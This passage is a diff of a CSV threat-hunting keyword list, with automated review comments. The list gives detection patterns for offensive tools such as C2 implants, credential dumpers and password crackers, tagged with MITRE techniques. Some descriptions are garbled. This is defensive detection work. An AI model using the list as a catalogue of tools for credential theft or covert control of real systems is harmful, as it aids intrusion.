-"*inlineExecute.nim*","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","10","10","641","85","2023-08-31T14:52:00Z","2023-02-13T13:42:39Z" +"*inlineExecute.nim*","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","10","10","643","86","2023-08-31T14:52:00Z","2023-02-13T13:42:39Z" "*InlineExecute-Assembly*","offensive_tool_keyword","cobaltstrike","InlineExecute-Assembly is a proof of concept Beacon Object File (BOF) that allows security professionals to perform in process .NET assembly execution as an alternative to Cobalt Strikes traditional fork and run execute-assembly module","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29","C2","https://github.com/anthemtotheego/InlineExecute-Assembly","1","1","N/A","10","10","490","114","2023-07-22T23:25:15Z","2021-07-08T17:40:07Z" "*InlineShellcode*","offensive_tool_keyword","HardHatC2","A C# Command & Control framework","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/DragoQCC/HardHatC2","1","1","N/A","10","10","825","133","2023-09-06T05:17:05Z","2022-12-08T19:40:47Z" "*InlineWhispers.py*","offensive_tool_keyword","cobaltstrike","Tool for working with Direct System Calls in Cobalt Strike's Beacon Object Files (BOF)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/outflanknl/InlineWhispers","1","1","N/A","10","10","286","42","2021-11-09T15:39:27Z","2020-12-25T16:52:50Z" 
@@ -11700,25 +11853,25 @@ "*ins1gn1a/Frampton*","offensive_tool_keyword","frampton","PE Binary Shellcode Injector - Automated code cave discovery. shellcode injection - ASLR bypass - x86/x64 compatible","T1055 - T1548.002 - T1129 - T1001","TA0002 - TA0003- TA0004 -TA0011","N/A","N/A","POST Exploitation tools","https://github.com/ins1gn1a/Frampton","1","1","N/A","N/A","1","69","16","2019-11-24T22:34:48Z","2019-10-29T00:22:14Z" "*InsecurePowerShell*","offensive_tool_keyword","InsecurePowerShell","powershell without securities features","T1059 - T1086 - T1117","TA0002 - TA0003 - TA0040","N/A","N/A","Defense Evasion","https://github.com/cobbr/InsecurePowerShell","1","0","N/A","N/A","1","98","18","2017-12-19T03:40:33Z","2017-12-17T02:16:21Z" "*insecurityofthings*jackit*","offensive_tool_keyword","jackit","This is a partial implementation of Bastilles MouseJack exploit. See mousejack.com for more details. Full credit goes to Bastilles team for discovering this issue and writing the libraries to work with the CrazyRadio PA dongle. Also. thanks to Samy Kamkar for KeySweeper. to Thorsten Schroeder and Max Moser for their work on KeyKeriki and to Travis Goodspeed. 
We stand on the shoulders of giants.","T1210 - T1212 - T1560 - T1562","TA0002 - TA0009","N/A","N/A","Exploitation tools","https://github.com/insecurityofthings/jackit","1","0","N/A","N/A","8","756","138","2020-10-01T04:37:00Z","2016-07-01T23:21:56Z" -"*insert_top_100_passwords_1_G*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" -"*InsidePro-PasswordsPro.rule*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" -"*InspectAssembly.csproj*","offensive_tool_keyword","InspectAssembly","Inspect's a target .NET assembly's CIL for calls to deserializers and .NET remoting usage to aid in triaging potential privilege escalations. ","T1055.012 - T1027 - T1112","TA0005 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/matterpreter/OffensiveCSharp/tree/master/InspectAssembly","1","1","N/A","10","10","1214","251","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" -"*InspectAssembly.exe*","offensive_tool_keyword","InspectAssembly","Inspect's a target .NET assembly's CIL for calls to deserializers and .NET remoting usage to aid in triaging potential privilege escalations. 
","T1055.012 - T1027 - T1112","TA0005 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/matterpreter/OffensiveCSharp/tree/master/InspectAssembly","1","1","N/A","10","10","1214","251","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" +"*insert_top_100_passwords_1_G*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*InsidePro-PasswordsPro.rule*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*InspectAssembly.csproj*","offensive_tool_keyword","InspectAssembly","Inspect's a target .NET assembly's CIL for calls to deserializers and .NET remoting usage to aid in triaging potential privilege escalations. ","T1055.012 - T1027 - T1112","TA0005 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/matterpreter/OffensiveCSharp/tree/master/InspectAssembly","1","1","N/A","10","10","1214","252","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" +"*InspectAssembly.exe*","offensive_tool_keyword","InspectAssembly","Inspect's a target .NET assembly's CIL for calls to deserializers and .NET remoting usage to aid in triaging potential privilege escalations. 
","T1055.012 - T1027 - T1112","TA0005 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/matterpreter/OffensiveCSharp/tree/master/InspectAssembly","1","1","N/A","10","10","1214","252","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" "*install powershell-empire*","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","0","N/A","N/A","10","3589","533","2023-09-08T05:50:59Z","2019-08-01T04:22:31Z" -"*install * roadrecon*","offensive_tool_keyword","ROADtools","A collection of Azure AD tools for offensive and defensive security purposes","T1136.003 - T1078.004 - T1021.006 - T1003.003","TA0002 - TA0004 - TA0005 - TA0006","N/A","N/A","Network Exploitation tools","https://github.com/dirkjanm/ROADtools","1","1","N/A","N/A","10","1353","206","2023-09-27T08:30:55Z","2020-03-28T09:56:08Z" -"*install 
amass","offensive_tool_keyword","Amass","In-depth subdomain enumeration tool that performs scraping. recursive brute forcing06/01/2021 crawling of web archives06/01/2021 name altering and reverse DNS sweeping","T1593 - T1594 - T1595 - T1567 - T1569","TA0007 - TA0009 - TA0004 - TA0005 - TA0011","N/A","N/A","Information Gathering","https://github.com/OWASP/Amass","1","0","N/A","N/A","10","10153","1759","2023-09-19T11:29:11Z","2018-07-10T16:05:08Z" -"*install bloodhound*","offensive_tool_keyword","bloodhound","A Python based ingestor for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/fox-it/BloodHound.py","1","0","N/A","10","10","1538","268","2023-09-27T07:56:12Z","2018-02-26T14:44:20Z" -"*install c2tc-domaininfo*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","6596","920","2023-10-03T20:36:09Z","2019-01-17T22:07:38Z" +"*install * roadrecon*","offensive_tool_keyword","ROADtools","A collection of Azure AD tools for offensive and defensive security purposes","T1136.003 - T1078.004 - T1021.006 - T1003.003","TA0002 - TA0004 - TA0005 - TA0006","N/A","N/A","Network Exploitation tools","https://github.com/dirkjanm/ROADtools","1","1","N/A","N/A","10","1355","206","2023-10-04T08:58:38Z","2020-03-28T09:56:08Z" +"*install amass","offensive_tool_keyword","Amass","In-depth subdomain enumeration tool that performs scraping. 
recursive brute forcing06/01/2021 crawling of web archives06/01/2021 name altering and reverse DNS sweeping","T1593 - T1594 - T1595 - T1567 - T1569","TA0007 - TA0009 - TA0004 - TA0005 - TA0011","N/A","N/A","Information Gathering","https://github.com/OWASP/Amass","1","0","N/A","N/A","10","10160","1761","2023-09-19T11:29:11Z","2018-07-10T16:05:08Z" +"*install bloodhound*","offensive_tool_keyword","bloodhound","A Python based ingestor for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/fox-it/BloodHound.py","1","0","N/A","10","10","1539","268","2023-09-27T07:56:12Z","2018-02-26T14:44:20Z" +"*install c2tc-domaininfo*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","6609","921","2023-10-04T21:02:15Z","2019-01-17T22:07:38Z" "*install cdn-proxy*","offensive_tool_keyword","cdn-proxy","cdn-proxy is a set of tools for bypassing IP allow listing intended to restrict origin access to requests originating from shared CDNs.","T1100 - T1090 - T1105 - T1133 - T1190","TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/RyanJarv/cdn-proxy","1","0","N/A","N/A","3","213","25","2022-08-25T00:40:25Z","2022-03-07T21:11:07Z" -"*install certsync*","offensive_tool_keyword","certsync","Dump NTDS with golden certificates and UnPAC the hash","T1553.002 - T1003.001 - T1145","TA0002 - TA0003 - TA0006","N/A","N/A","Credential Access","https://github.com/zblurx/certsync","1","0","N/A","N/A","6","566","65","2023-07-25T15:22:06Z","2023-01-31T15:37:12Z" -"*install coercer*","offensive_tool_keyword","Coercer","A python script to automatically coerce a Windows server to 
authenticate on an arbitrary machine through many methods.","T1110 - T1021 - T1020","TA0006 - TA0010","N/A","N/A","Exploitation tools","https://github.com/p0dalirius/Coercer","1","0","N/A","N/A","10","1359","152","2023-09-22T07:44:36Z","2022-06-30T16:52:33Z" +"*install certsync*","offensive_tool_keyword","certsync","Dump NTDS with golden certificates and UnPAC the hash","T1553.002 - T1003.001 - T1145","TA0002 - TA0003 - TA0006","N/A","N/A","Credential Access","https://github.com/zblurx/certsync","1","0","N/A","N/A","6","567","65","2023-07-25T15:22:06Z","2023-01-31T15:37:12Z" +"*install coercer*","offensive_tool_keyword","Coercer","A python script to automatically coerce a Windows server to authenticate on an arbitrary machine through many methods.","T1110 - T1021 - T1020","TA0006 - TA0010","N/A","N/A","Exploitation tools","https://github.com/p0dalirius/Coercer","1","0","N/A","N/A","10","1361","154","2023-10-04T05:59:13Z","2022-06-30T16:52:33Z" "*--install -d kali-linux*","offensive_tool_keyword","kali","Kali Linux is an open-source. Debian-based Linux distribution geared towards various information security tasks. such as Penetration Testing. Security Research. 
Computer Forensics and Reverse Engineering","T1210.001 - T1185 - T1059 - T1400 - T1506 - T1213","TA0001 - TA0002 - TA0009","N/A","N/A","Exploitation OS","https://www.kali.org/","1","0","wsl installation","N/A","N/A","N/A","N/A","N/A","N/A" "*install dploot*","offensive_tool_keyword","dploot","DPAPI looting remotely in Python","T1003.006 - T1027 - T1110.004","TA0006 - TA0007 - TA0010","N/A","N/A","Credential Access","https://github.com/zblurx/dploot","1","0","N/A","10","3","279","23","2023-09-30T11:10:26Z","2022-05-24T11:05:21Z" -"*install gobuster*","offensive_tool_keyword","gobuster","Directory/File DNS and VHost busting tool written in Go","T1595 - T1133 - T1110 - T1027 - T1132 - T1048","TA0010 - TA0001 - TA0006 - TA0005 - TA0011","N/A","N/A","Network Exploitation Tools","https://github.com/OJ/gobuster","1","0","N/A","N/A","10","8199","1120","2023-09-12T22:37:40Z","2014-11-14T13:18:35Z" +"*install gobuster*","offensive_tool_keyword","gobuster","Directory/File DNS and VHost busting tool written in Go","T1595 - T1133 - T1110 - T1027 - T1132 - T1048","TA0010 - TA0001 - TA0006 - TA0005 - TA0011","N/A","N/A","Network Exploitation Tools","https://github.com/OJ/gobuster","1","0","N/A","N/A","10","8203","1120","2023-09-12T22:37:40Z","2014-11-14T13:18:35Z" "*install h8mail*","offensive_tool_keyword","h8mail","Powerful and user-friendly password hunting tool.","T1581.002 - T1591 - T1590 - T1596 - T1592 - T1217.001","TA0010","N/A","N/A","Information Gathering","https://github.com/opencubicles/h8mail","1","0","N/A","N/A","1","9","5","2019-08-19T09:46:33Z","2019-08-19T09:45:32Z" -"*install hakrawler*","offensive_tool_keyword","hakrawler","Simple fast web crawler designed for easy and quick discovery of endpoints and assets within a web application","T1190 - T1212 - T1087.001","TA0007 - TA0003 - TA0009","N/A","N/A","Web Attacks","https://github.com/hakluke/hakrawler","1","0","N/A","6","10","3967","458","2023-07-22T19:39:11Z","2019-12-15T13:54:43Z" -"*install 
hping3*","offensive_tool_keyword","hping","hping3 is a network tool able to send custom TCP/IP","T1046 - T1190 - T1200","TA0001 - TA0002 - TA0007","N/A","N/A","Sniffing & Spoofing","https://github.com/antirez/hping","1","0","N/A","N/A","10","1296","326","2022-10-04T12:14:24Z","2012-06-13T17:41:54Z" -"*install hydra-gtk*","offensive_tool_keyword","thc-hydra","Parallelized login cracker which supports numerous protocols to attack.","T1110.001","TA0006","N/A","N/A","Credential Access","https://github.com/vanhauser-thc/thc-hydra","1","0","N/A","N/A","10","8179","1825","2023-09-28T22:11:10Z","2014-04-24T14:45:37Z" +"*install hakrawler*","offensive_tool_keyword","hakrawler","Simple fast web crawler designed for easy and quick discovery of endpoints and assets within a web application","T1190 - T1212 - T1087.001","TA0007 - TA0003 - TA0009","N/A","N/A","Web Attacks","https://github.com/hakluke/hakrawler","1","0","N/A","6","10","3971","458","2023-07-22T19:39:11Z","2019-12-15T13:54:43Z" +"*install hping3*","offensive_tool_keyword","hping","hping3 is a network tool able to send custom TCP/IP","T1046 - T1190 - T1200","TA0001 - TA0002 - TA0007","N/A","N/A","Sniffing & Spoofing","https://github.com/antirez/hping","1","0","N/A","N/A","10","1297","326","2022-10-04T12:14:24Z","2012-06-13T17:41:54Z" +"*install hydra-gtk*","offensive_tool_keyword","thc-hydra","Parallelized login cracker which supports numerous protocols to attack.","T1110.001","TA0006","N/A","N/A","Credential Access","https://github.com/vanhauser-thc/thc-hydra","1","0","N/A","N/A","10","8184","1825","2023-09-28T22:11:10Z","2014-04-24T14:45:37Z" "*install impacket*","offensive_tool_keyword","cobaltstrike","Fileless lateral movement tool that relies on ChangeServiceConfigA to run command","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - 
T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Mr-Un1k0d3r/SCShell","1","0","N/A","10","10","1241","228","2023-07-10T01:31:54Z","2019-11-13T23:39:27Z" "*install Jira-Lens*","offensive_tool_keyword","Jira-Lens","Fast and customizable vulnerability scanner For JIRA written in Python","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/MayankPandey01/Jira-Lens","1","0","N/A","N/A","3","206","31","2022-08-23T09:57:52Z","2021-11-14T18:37:47Z" "*install macchanger*","offensive_tool_keyword","Rudrastra","Make a Fake wireless access point aka Evil Twin","T1491 - T1090.004 - T1557.001","TA0040 - TA0011 - TA0002","N/A","N/A","Sniffing & Spoofing","https://github.com/SxNade/Rudrastra","1","0","N/A","8","1","46","21","2023-04-22T15:10:42Z","2020-11-05T09:38:15Z" 
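Review bot: The keyword on the re-added Amass row is `"*install amass"` with no trailing `*`, while every other `*install …*` keyword in this hunk ends in a wildcard. If the consumer treats `*` as a glob (not shown here, so worth confirming), this row would only match when the command line ends right after `amass`; I would make it `"*install amass*"`. The same row's description reads `recursive brute forcing06/01/2021 crawling of web archives06/01/2021 name altering`, which looks like a date pasted in where separators were intended, and it carries over unchanged because the commit only refreshes the star and fork counters. Separately, broad context rows such as `*install impacket*` (attributed here to cobaltstrike via the SCShell link) will probably fire on ordinary package installs, so a false-positive note in `metadata_comment`, as the greyware rows already have, would help people tuning detections from this list.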
@@ -11726,13 +11879,13 @@
 "*install pivotnacci*","offensive_tool_keyword","pivotnacci","A tool to make socks connections through HTTP agents","T1090 - T1090.003","TA0003 - TA0011","N/A","N/A","C2 - Persistence","https://github.com/blackarrowsec/pivotnacci","1","0","N/A","9","10","614","111","2021-03-30T14:37:25Z","2020-04-28T11:36:45Z"
 "*install proxychains*","offensive_tool_keyword","proxychains","proxychains - a tool that forces any TCP connection made by any given application to follow through proxy like TOR or any other SOCKS4 SOCKS5 or HTTP(S) proxy","T1090.004 - T1090.003 - T1027","TA0001 - TA0006 - TA0040","N/A","N/A","Exploitation tools","https://github.com/haad/proxychains","1","0","N/A","N/A","10","5489","586","2023-04-05T10:32:16Z","2011-02-25T12:27:05Z"
 "*install pypykatz*","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","10","2471","369","2023-05-30T16:14:22Z","2018-05-25T22:21:20Z"
-"*install s3scanner*","offensive_tool_keyword","S3Scanner","Scan for open S3 buckets and dump the contents","T1583 - T1583.002 - T1114 - T1114.002","TA0010","N/A","N/A","Reconnaissance","https://github.com/sa7mon/S3Scanner","1","0","N/A","8","10","2221","366","2023-10-02T13:25:28Z","2017-06-19T22:14:21Z"
+"*install s3scanner*","offensive_tool_keyword","S3Scanner","Scan for open S3 buckets and dump the contents","T1583 - T1583.002 - T1114 - T1114.002","TA0010","N/A","N/A","Reconnaissance","https://github.com/sa7mon/S3Scanner","1","0","N/A","8","10","2222","366","2023-10-02T13:25:28Z","2017-06-19T22:14:21Z"
 "*install samdump2*","offensive_tool_keyword","samdump2","Retrieves syskey and extract hashes from Windows 2k/NT/XP/Vista SAM.","T1003.002 - T1564.001","TA0006 - TA0010","N/A","N/A","Credential Access","https://salsa.debian.org/pkg-security-team/samdump2","1","0","N/A","10","6","N/A","N/A","N/A","N/A"
-"*install smbmap*","offensive_tool_keyword","smbmap","SMBMap allows users to enumerate samba share drives across an entire domain. List share drives. drive permissions. share contents. upload/download functionality. file name auto-download pattern matching. and even execute remote commands. This tool was designed with pen testing in mind. and is intended to simplify searching for potentially sensitive data across large networks.","T1210.001 - T1083 - T1213 - T1021","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Information Gathering","https://github.com/ShawnDEvans/smbmap","1","0","N/A","10","10","1554","344","2023-09-14T20:51:52Z","2015-03-16T13:15:00Z"
-"*install smbmap*","offensive_tool_keyword","smbmap","SMBMap allows users to enumerate samba share drives across an entire domain. List share drives. drive permissions. share contents. upload/download functionality. file name auto-download pattern matching. and even execute remote commands. This tool was designed with pen testing in mind. and is intended to simplify searching for potentially sensitive data across large networks.","T1210.001 - T1083 - T1213 - T1021","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Information Gathering","https://github.com/ShawnDEvans/smbmap","1","0","N/A","10","10","1554","344","2023-09-14T20:51:52Z","2015-03-16T13:15:00Z"
+"*install smbmap*","offensive_tool_keyword","smbmap","SMBMap allows users to enumerate samba share drives across an entire domain. List share drives. drive permissions. share contents. upload/download functionality. file name auto-download pattern matching. and even execute remote commands. This tool was designed with pen testing in mind. and is intended to simplify searching for potentially sensitive data across large networks.","T1210.001 - T1083 - T1213 - T1021","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Information Gathering","https://github.com/ShawnDEvans/smbmap","1","0","N/A","10","10","1555","344","2023-09-14T20:51:52Z","2015-03-16T13:15:00Z"
+"*install smbmap*","offensive_tool_keyword","smbmap","SMBMap allows users to enumerate samba share drives across an entire domain. List share drives. drive permissions. share contents. upload/download functionality. file name auto-download pattern matching. and even execute remote commands. This tool was designed with pen testing in mind. and is intended to simplify searching for potentially sensitive data across large networks.","T1210.001 - T1083 - T1213 - T1021","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Information Gathering","https://github.com/ShawnDEvans/smbmap","1","0","N/A","10","10","1555","344","2023-09-14T20:51:52Z","2015-03-16T13:15:00Z"
 "*install tor deb.torproject.org-keyring*","offensive_tool_keyword","torproject","Browse Privately. Explore Freely. Defend yourself against tracking and surveillance. Circumvent censorship.","T1090 - T1134 - T1188 - T1307 - T1497 - T1560","TA0001 - TA0002 - TA0005 - TA0011","N/A","N/A","Data Exfiltration","torproject.org","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
 "*install udmp_parser*","offensive_tool_keyword","udmp-parser","A Cross-Platform C++ parser library for Windows user minidumps.","T1005 - T1059.003 - T1027.002","TA0009 - TA0005 - TA0040","N/A","N/A","Credential Access","https://github.com/0vercl0k/udmp-parser","1","0","N/A","6","2","160","22","2023-08-27T18:30:24Z","2022-01-30T18:56:21Z"
-"*install wapiti*","offensive_tool_keyword","wapiti","Web vulnerability scanner written in Python3","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/wapiti-scanner/wapiti","1","0","N/A","N/A","8","785","132","2023-09-27T07:26:22Z","2020-06-06T20:17:55Z"
+"*install wapiti*","offensive_tool_keyword","wapiti","Web vulnerability scanner written in Python3","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/wapiti-scanner/wapiti","1","0","N/A","N/A","8","785","132","2023-10-04T14:09:48Z","2020-06-06T20:17:55Z"
 "*install_aclpwn*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z"
 "*install_ad_apt_tools*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z"
 "*install_adidnsdump*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z"
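Review bot: The `*install smbmap*` row appears twice with byte-identical fields, and this hunk refreshes the star count on both copies (`1554` to `1555`) instead of collapsing them. A detection rule generated from this list would likely match and alert twice on the same event, and the two copies can drift apart on a later refresh. Keep a single `"*install smbmap*",...` row and add a uniqueness check on the `keyword` column to whatever step regenerates the file. Separately, the `*install tor deb.torproject.org-keyring*` context row carries `torproject.org` in `metadata_link` with no scheme, unlike the other rows in this hunk, which may trip consumers that parse that column as a URL.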
@@ -11802,33 +11955,33 @@ "*install_winrar_wine32.exe*","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1617","584","2023-10-03T22:06:35Z","2016-11-16T10:40:04Z" "*install_winrar_wine64.*","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1617","584","2023-10-03T22:06:35Z","2016-11-16T10:40:04Z" "*install_zerologon*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" -"*installexe-persistence*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - 